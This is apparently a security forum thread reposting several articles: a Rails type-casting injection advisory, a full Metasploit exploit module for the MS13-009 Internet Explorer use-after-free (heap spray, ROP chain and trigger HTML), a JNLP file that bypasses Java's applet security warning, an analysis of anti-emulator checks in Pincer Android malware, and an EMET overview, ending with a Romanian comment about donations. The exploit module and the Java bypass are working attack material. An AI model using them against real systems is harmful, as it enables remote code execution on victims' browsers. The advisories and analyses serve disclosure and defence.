Microsoft SQL Server and IBM DB2 data-type injection attacks In the http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3221 entry, what we meant is that CVE-2013-3221 is exclusively about the behavior of Ruby on Rails as discussed in the listed MLIST:[rubyonrails-security] 20130207 reference. If a reference is about a data-type injection impact in an application other than a Ruby on Rails application, it should not be mapped to this CVE. However, an applicable reference about interaction between Ruby on Rails and Microsoft SQL Server (or interaction between Ruby on Rails and IBM DB2) should be mapped to this CVE. (There might be a misinterpretation that CVE-2013-3221 is only about interaction with MySQL. http://twitter.com/dakull/statuses/326633931636084736 possibly suggests that, but we're bringing this up mostly because of a comment that someone else sent directly to MITRE.) Common patterns used in Ruby on Rails applications could allow an attacker to generate SQL that, when combined with some database server's typecasting code, generates queries that match incorrect records. Note: This is a code and best-practise advisory, there is no patch to apply or updated version to install. Databases Affected: MySQL, SQLServer and some configurations of DB2 Not affected: SQLite, PostgreSQL, Oracle Outline - ------- When comparing two values of differing types most databases will either generate an error or return 'false'. Other databases will attempt to convert those values to a common type to enable comparison. For example in MySQL comparing a string with an integer will cast the string into an integer. Given that any string which isn't an invalid integer will convert to 0, this could allow an attacker to bypass certain queries. If your application has XML or JSON parameter parsing enabled, an attacker will be able to generate queries like this unless you take care to typecast your input values. For example: User.where(:login_token=>params[:token]).first Could be made to generate the query: SELECT * FROM `users` WHERE `login_token` = 0 LIMIT 1; Which will match the first value which doesn't contain a valid integer. This vulnerability affects multiple programming languages, and multiple databases, be sure to audit your other applications to see if they suffer the same issues. Work Arounds - ------------ There are two options to avoid these problems. The first is to disable JSON and XML parameter parsing. Depending on the version of rails you use you will have to place one of the following snippets in an application initializer Rails 3.2, 3.1 and 3.0: ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::XML) ActionDispatch::ParamsParser::DEFAULT_PARSERS.delete(Mime::JSON) Rails 2.3: ActionController::Base.param_parsers.delete(Mime::XML) ActionController::Base.param_parsers.delete(Mime::JSON) If your application relies on accepting these formats you will have to take care to explicitly convert parameters to their intended types. For example: User.where(:login_token=>params[:token].to_s) Fixes - ----- Unfortunately it is not possible for ActiveRecord to automatically protect against all instances of this attack due to the API we expose. For example: User.where("login_token = ? AND expires_at > ?", params[:token], Time.now) Without parsing the SQL fragments it is not possible to determine what type params[:token] should be cast to. Future releases of Rails will contain changes to mitigate the risk of this class of vulnerability, however as long as this feature is still supported this risk will remain. Credits - ------- Thanks to joernchen of Phenoelit for reporting this to us and to Jonathan Rudenberg for helping to review the advisory. - -- Cheers, Koz References: http://twitter.com/dakull/statuses/326633931636084736 http://seclists.org/oss-sec/2013/q2/170 http://cve.mitre.org/cve/request_id.html Sursa: Microsoft SQL Server and IBM DB2 data-type injection attacks - CXSecurity.com

[h=1]CVE-2013-0027 Discovered affects Internet Explorer 6 to 10[/h]Posted by: FastFlux April 22, 2013 The latest exploit, CVE-2013-0027 affected almost all versions of Microsoft Internet Explorer and affected all windows operating systems including the major server editions too. Thirteen private vulnerabilities were recently patched in a security bulletin by Microsoft. The exposure, now branded as critical for Internet Explorer 6, 7, 8, 9 and 10, admitted remote code execution if a user attempted to visit a specially crafted web page using those versions of IE. The vulnarbility allowed an attacker to gain the same user privileged as the current users, which is triggered by an improper memory operation executed by IE when addressing the crafted HTML content. The exploit for MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free vulnerability has been released by Metasploit and is available on ExploitDb as well. Here is the code for this exploit: ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free", 'Description' => %q{ This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a CParaElement node is released but a reference is still kept in CDoc. This memory is reused when a CDoc relayout is performed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Scott Bell <scott.bell@security-assessment.com>' # Vulnerability discovery & Metasploit module ], 'References' => [ [ 'CVE', '2013-0025' ], [ 'MSB', 'MS13-009' ], [ 'URL', 'http://security-assessment.com/files/documents/advisory/ie_slayoutrun_uaf.pdf' ] ], 'Payload' => { 'BadChars' => "\x00", 'Space' => 920, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x5f4 } ] ], 'Privileged' => false, 'DisclosureDate' => "Feb 13 2013", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # ROP chain generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_nops = [0x77c39f92].pack("V") * 11 # RETN rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) rop_payload << rop_nops rop_payload << [0x77c364d5].pack("V") # POP EBP # RETN rop_payload << [0x77c15ed5].pack("V") # XCHG EAX, ESP # RETN rop_payload << [0x77c35459].pack("V") # PUSH ESP # RETN rop_payload << [0x77c39f92].pack("V") # RETN rop_payload << [0x0c0c0c8c].pack("V") # Shellcode offset rop_payload << code end return rop_payload end def get_exploit(my_target, cli) p = get_payload(my_target, cli) js = heap_spray(my_target, p) html = %Q| <!doctype html> <html> <head> <script> #{js} </script> <script> var data; var objArray = new Array(1150); setTimeout(function(){ document.body.style.whiteSpace = "pre-line"; CollectGarbage(); for (var i=0;i<1150;i++){ objArray[i] = document.createElement('div'); objArray[i].className = data += unescape("%u0c0c%u0c0c"); } setTimeout(function(){document.body.innerHTML = "boo"}, 100) }, 100) </script> </head> <body> <p> </p> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = get_exploit(my_target, cli) html = html.gsub(/^\t\t/, '') print_status "Sending HTML..." send_response(cli, html, {'Content-Type'=>'text/html'}) end end Sursa: CVE-2013-0027 Discovered affects Internet Explorer 6 to 10 | ZeroSecurity

[h=3]Yet Another Java Security Warning Bypass[/h]posted by: Nico Waisman Not so long ago we posted about a JavaSecurity Warning bypass that used a serialized applet instance. That bypass was fixed in Java 7 update 13 so we had to keep looking at new ways of defeating the warning pop-up that requires user interaction in order to run applets. We continued auditing the code that performed the checks when starting an applet and ended up arriving at the method “sun.plugin2.main.client.PluginMain.performSSVValidation(Plugin2Manager)” This method will end up calling some other methods in the com.sun.javaws.ui.SecureStaticVersioning class that will show us that annoying security warning pop up. But just take a quick look at the performSSVValidation method implementation: public static boolean performSSVValidation(Plugin2Manager paramPlugin2Manager) throws ExitException { boolean bool = Boolean.valueOf(paramPlugin2Manager. getParameter("__applet_ssv_validated")). booleanValue(); if (bool) return false; LaunchDesc localLaunchDesc = null; AppInfo localAppInfo = null; [...] // ... more code that calls com.sun.javaws.ui.SecureStaticVersioning to perform more checks [...] } What is that __applet_ssv_validated parameter?? Obviously this is an internal undocumented parameter and, as you can see, it turns out that if it is set to true, no checks are performed. The first thing we tried was to simply set that parameter to true in our evil applet, but it didn't work. While debugging we noticed that the parameter was not set on the applet despite our setting it to true. Basically sun.plugin2.main.server.MozillaPlugin.addParameter(String, String) is filtering the parameters: private void addParameter(String paramString1, String paramString2) { if ((paramString1 != null) && (paramString1.charAt(0) != '_') && (!paramString1.equals("PARAM"))) this.params.put(paramString1, paramString2); } But as you may know, Java provides another way of launching applets in a browser besides using the applet, object or embed tags. Java Web Start technology is what we can use. Now the applet description is provided by using a JNLP file and parameters can be set to the applet by using the <param> tag. We can see that when using Java Web Start, the performSSVValidation method is also called So lets try to launch an applet with Java Web Start and set the __applet_ssv_validated parameter to true with a JNLP file like this one: <?xml version="1.0" encoding="utf-8"?> <jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="applet_security_bypass.jnlp"> <information> <title>Applet Test JNLP</title> <vendor>demo</vendor> <description>basic applet test</description> <offline-allowed/> </information> <resources> <j2se version="1.7" href="http://java.sun.com/products/autodl/j2se" /> <jar href="basicApplet.jar" main="true" /> </resources> <applet-desc name="Demo Applet" main-class="Main" width="1" height="1"> <param name="__applet_ssv_validated" value="true"></param> </applet-desc> <update check="background"/> </jnlp> And by know you have already realized that this just works and parameters are not filtered. The Security Warning pop-up message is not displayed and our applet happily runs! Ironically on Tuesday 16th April, exactly while I was at the Infiltrate MasterClass teaching how to audit and exploit Java, Oracle released update 21 which fixed this bypass and a ton of others. The time investment for stealthily exploiting Java is increasing but finding bypasses like this makes it worth the time! Esteban Guillardoy Sursa: Immunity Products: Yet Another Java Security Warning Bypass

Changing the IMEI, Provider, Model, and Phone Number in the Android emulator Pincer I was having a look at the Pincer family of Android malware and came across some code designed to hinder analysis. From the decompilation of com/security/cert/a/a/c.class: String str1 = com.security.cert.b.b.b(paramContext); String str2 = com.security.cert.b.b.c(paramContext); String str3 = com.security.cert.b.b.d(paramContext); if(str3.toLowerCase().equals("android") || str1.equals("000000000000000") || str1.equals("012345678912345") || str2.equals("15555215554") || Build.MODEL.toLowerCase().equals("sdk") || Build.MODEL.toLowerCase().equals("generic")) At first glance, the application seems to be checking for generic values. The check against str2 is recognizable. It is the default phone number for the Android emulator. It is clear that the sample is also checking the model against the values sdk and generic. Having a look at com/security/cert/b/b.class to see what str1 and str3 are: public static String b(Context paramContext) { return ((TelephonyManager)paramContext.getSystemService("phone")).getDeviceId(); } public static String c(Context paramContext) { return ((TelephonyManager)paramContext.getSystemService("phone")).getLine1Number(); } public static String d(Context paramContext) { return ((TelephonyManager)paramContext.getSystemService("phone")).getNetworkOperatorName(); } The IMEI, phone number, network provider, and phone model are being checked against default emulator values. Crafty. I was running a generic AVD (Android Virtual Device) at the time and unfortunately got caught on all of these checks. Since compiling other people's large projects is something I avoid at all costs, I set out to patch these values in a hex editor. Here's how to change each one. Before editing any file, please make a backup! [h=4]IMEI[/h] Doing a quick grep of the android-sdk-linux/ folder reveals that, among a handful of other files, the two emulator binaries each contain only one occurrence of the default IMEI. /home/vrt/android-sdk-linux/tools/emulator-arm:1 /home/vrt/android-sdk-linux/tools/emulator-x86:1 These seem like a logical place to store the IMEI and since there is only one occurrence in each, it should be easy enough to edit and check the feedback. In any hex editor (GHex pictured) this value can be found between the strings +CGSN and +CUSD: Editing this value will change the AVD's IMEI on reboot. This process is detailed for Windows on the blogspot blooglog, which helped reassure me I was on the right track. [h=4]Network Provider[/h] Since the IMEI is in the emulator-arm binary, I tried blasting some of the other values in there as well. I began by adding the digits 0-9 into the first ten occurrences of the default network provider, Android. Luckily enough, the first occurrence of Android (at the time, Andr0id) is what is pulled as the network provider. You can see it edited to SrcFire in the following screenshot, sitting between 0.10.50 and info: [h=4]Model[/h] Since the model can change between AVD images, it is likely somewhere other than the binary. The Cobra Den's post on making changes to the Android emulator got me on the right track for finding it (as well as some other fields worth changing). The model name follows the label ro.product.model= in android-sdk-linux/platforms/[target platform]/images/system.img, making it very easy to spot: Note though, if you are loading from a snapshot, you will need to reload the AVD in order for these changes to take place. As well, if you are loading with a different system image (indicated by the -system option on emulator start), you will need to edit that image. [h=4]Phone Number[/h] The last four digits of the device's phone number are the port number that the emulator's console is running on. Since Pincer checks for an entire phone number (default prefix 1555521 + default console port number 5554), this was enough to circumvent the anti-analysis techniques encountered. Attempting to start up the emulator with the option -port 4141 provided this helpful tidbit: ERROR: option -port must be followed by an even integer number between 5554 and 5584 This gives a range of 16 phone numbers to work with. While allowing evasion of the anti-analysis in Pincer, a more intelligent malware author would write a check for 1555521. After some mass replacements with sed, I realized my normal trial and error approach would yield only error for changing the phone number. It turns out that the phone number is stored on the SIM card. Since there is no actual SIM card, one is emulated. This emulated SIM is hard coded in the emulator-arm binary. The reason replacements for 1555521 failed is because SIM cards have a specification that does not store the MSISDN (Mobile Subscriber Integrated Services Digital Network-Number, AKA phone number) in plain text. Instead, each set of digits is swapped in some reverse nibbled endianness nightmare. At this point I feel it's necessary to again give acknowledgment to The Cobra Den, which has a method for making a lot of these fields configurable by patching the Java getter methods, and to the CodePainters blog which has a post on editing the SIM card serial number. I had come across the source file external/qemu/telephony/sim_card.c in the Android source code, but the CodePainters post is really what made it click that the MSISDN number would be in there, and that all of that would also be in the binary. As these things go, I found multiple very helpful things at the same time that all led me to the answer. A quick way to find the MSISDN is to search for %d%df%d in the binary (highlighted in red below). The corresponding source code is in external/qemu/telephony/sim_card.c on line 436 in the current repo. The following is the format string portion of that sprintf: "+CRSM:144,0,ffffffffffffffffffffffffffffffffffff0781515525%d1%d%df%dffffffffffff" The interesting part is 515525%d1 (highlighted in blue). Swapping each set of two digits produces 1555521%d (thanks again CodePainters). That looks like the prefix to our mobile number. Edited in ghex: The edit in the previous screenshot will yield a phone number 1-876-543-[port number]. That gives (mostly) full control over the phone number. The first 7 digits are entirely configurable, and the last four can be any even number in the range 5554 and 5584 inclusive. A malware author could still block based on the last four digits of the phone number. If that starts happening though, I know what the last four digits of my next phone number will be. [h=4]Conclusion[/h] The biggest drawback to this method is that you must keep the length of each value the same, unless you wish to do some serious binary patching. As well, I have not tested these for stability. I will update this blog post with any issues that come to my attention. The following is a before and after screenshot of the target values: GG Posted by dgoddard at 1:22 PM Sursa: VRT: Changing the IMEI, Provider, Model, and Phone Number in the Android emulator

[h=1]Microsoft EMET 4.0 might be the best enterprise security tool you're not using yet[/h]Posted by Chad Loder in Information Security on Apr 22, 2013 10:37:24 AM Cross-posted from dangerous.net Last week Microsoft announced their 4.0 beta release of EMET (Enhanced Mitigation Experience Toolkit). If you are responsible for securing Windows systems, you should definitely be looking at this free tool if you haven't already. EMET is a toolkit provided by Microsoft to configure security controls on Windows systems making it more difficult for attackers to successfully launch exploits. EMET doesn't take the place of antivirus or patch management, but it does provide an important set of safeguards against not only existing exploits, but also against future 0-day exploits which have yet to be developed or released. Even the best signature-based antivirus programs don't do a good job at protecting from 0-days. EMET allows administrators to exercise fine-grained control over Windows' built-in security features in Windows 7 and higher, including: DEP (Data Execution Prevention) ASLR (Address Space Layout Randomization) SEHOP (Structured Exception Handling Overwrite Protection) ROP (Return-Oriented Programming) While DEP and ASLR have been supported by Microsoft since Windows XP SP2 and Windows Vista (respectively), one of the main weaknesses of this mitigation is that existing applications needed to be recompiled by the developer to "opt-in" to these security controls. A great benefit of EMET is that it allows administrators to "force" DEP and ASLR onto existing legacy applications. While there are many exploits out there which bypass DEP and ASLR, it's worth noting that the first versions of these exploits are sometimes thwarted by these controls, which buys you some time for either patches or antivirus detection to become available. There are good reasons why the Australian DSD (Defense Signals Directorate) has included DEP and ASLR on its "Top 35 Mitigations" for two years running. EMET 3.0 and 3.5 introduced the ability to manage EMET via GPO, putting installation and configuration within reach of the enterprise. EMET 4.0 builds on this feature set and includes some very useful new protections, including: SSL certificate pinning - allows mitigation of "man-in-the-middle" attacks by detecting situations where the Root CA for an SSL certificate has changed from the "pinned" value configured in EMET. For example, you can configure EMET to say "There is only a single trusted root CA that should ever be issuing certificates for acme.com, and if I see a certificate for any FQDN ending in .acme.com from a different CA, report this as a potential man-in-the-middle attack. You can pin the CA for entire domains or for individual certificates. EMET 4.0 beta ships with pinned certificates for login.live.com and login.microsoftonline.com, but administrators can add their own. Enhanced ROP mitigation. There is a never-ending arms race between OS and application developers on the one side and exploit developers on the other side. When a new mitigation technique is developed by Microsoft, clever exploit developers work hard to find ways to bypass the mitigation. In the case of ROP mitigations, EMET 3.5 included some basic ROP mitigations that blocked assembly language "return" calls to memory addresses corresponding to known lists of low-level memory management functions in certain DLLs. This rendered a common exploit technique ineffective. However, exploit developers responded with adjusted techniques to bypass EMET's ROP mitigations, such as returning into the memory management code a few bytes beyond the function prologue. I don't have enough time or space to do this fascinating topic justice, but you can read a good overview of ROP exploit techniques here. EMET 4.0 blocks some of these mitigation bypass techniques, which puts the onus back on exploit developers in this cat-and-mouse game. I'm looking forward to the first white paper detailing how the new mitigations can be bypassed. Improved logging. With the new and improved EMET notifier agent, EMET 4.0 does a much better job at logging events to the Windows event log. This opens up the possibility of using a centralized event log monitoring systems such as Microsoft Systems Center Operations Manager (SCOM) 2012 to act as an enterprise-wide early detection system for exploit attempts. Imagine having instantaneous alerting any time EMET blocked an attack on any Windows system across the enterprise. One could also use a free tool like event-log-to-syslog to gather event logs centrally, or even something like Splunk (with universal forwarders) if you don't mind breaking the bank. Another benefit of centrally logging and analyzing EMET events is it will give you early warning on EMET compatibility problems. Past versions of EMET have been known to cause problems with certain applications, for example I found that the LastPass extension for Chrome needed certain EMET settings disabled in order to run. If you haven't used EMET before in your enterprise, you will definitely want to introduce EMET in a limited rollout before going enterprise-wide via GPO. Note any programs requiring exemption or settings customization and make sure those settings are reflected in the GPO policy. Sursa: https://community.rapid7.com/community/infosec/blog/2013/04/22/microsoft-emet-40-might-be-the-best-enterprise-security-tool-youre-not-using-yet

Da, e o idee... Problema principala ar fi de unde vin acei bani, pentru ca e posibil ca unii oameni sa doneze bani care nu le apartin si apoi cine stie, poate apar probleme. Ar mai fi persoane interesate? Practic de plata este doar hosting-ul, insa daca am strange ceva am putea da niste premii, sa organizam niste concursuri. Totul ar fi "open". Ar mai fi doritori sa doneze?